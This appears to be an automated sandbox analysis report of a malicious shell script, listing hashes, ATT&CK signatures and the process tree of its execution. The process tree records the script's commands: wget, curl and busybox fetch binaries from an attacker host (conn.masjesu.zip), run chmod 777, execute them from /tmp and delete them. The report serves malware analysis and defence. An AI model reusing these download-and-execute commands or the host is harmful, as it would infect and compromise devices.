Analysis
-
max time kernel
149s -
max time network
31s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
18/10/2024, 02:06
Static task
static1
Behavioral task
behavioral1
Sample
840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh
-
Size
10KB
-
MD5
f6e271e4d94f1fe16e461104ef8f736a
-
SHA1
dc7560e563611fd68f908f9baad26d7487947976
-
SHA256
840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da
-
SHA512
4435d20a9257c676d12aecdcca5eee355e04974d3429277c941b97658f8cefb32bc6b77fa47934d12ff9dc7d5457e3ab6a4ae80e4b7fa206d9ac58a61c02b084
-
SSDEEP
192:so4QVCOCkSMFkqcTZx45O4QVCOoZx4MF1:sFkJFkqcTZx4RZx4MF1
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 3 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 790 chmod 832 chmod 839 chmod -
Executes dropped EXE 3 IoCs
ioc pid Process /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N 791 wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N /tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3 833 yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3 /tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU 840 v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 11 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 842 wget 843 curl 749 busybox 836 curl 796 wget 799 curl 801 busybox 835 wget 838 busybox 725 wget 742 curl -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N curl File opened for modification /tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3 curl File opened for modification /tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU curl
Processes
-
/tmp/840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh/tmp/840eaa949155296505461a38442f5ce5a579f9e9aadc6381d7e6263f718f31da.sh1⤵PID:719
-
/bin/rm/bin/rm bins.sh2⤵PID:723
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵
- System Network Configuration Discovery
PID:725
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:742
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵
- System Network Configuration Discovery
PID:749
-
-
/bin/chmodchmod 777 wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵
- File and Directory Permissions Modification
PID:790
-
-
/tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N./wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵
- Executes dropped EXE
PID:791
-
-
/bin/rmrm wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N2⤵PID:795
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵
- System Network Configuration Discovery
PID:796
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:799
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵
- System Network Configuration Discovery
PID:801
-
-
/bin/chmodchmod 777 yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3./yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵
- Executes dropped EXE
PID:833
-
-
/bin/rmrm yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu32⤵PID:834
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵
- System Network Configuration Discovery
PID:835
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:836
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵
- System Network Configuration Discovery
PID:838
-
-
/bin/chmodchmod 777 v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵
- File and Directory Permissions Modification
PID:839
-
-
/tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU./v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵
- Executes dropped EXE
PID:840
-
-
/bin/rmrm v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU2⤵PID:841
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵
- System Network Configuration Discovery
PID:842
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:843
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97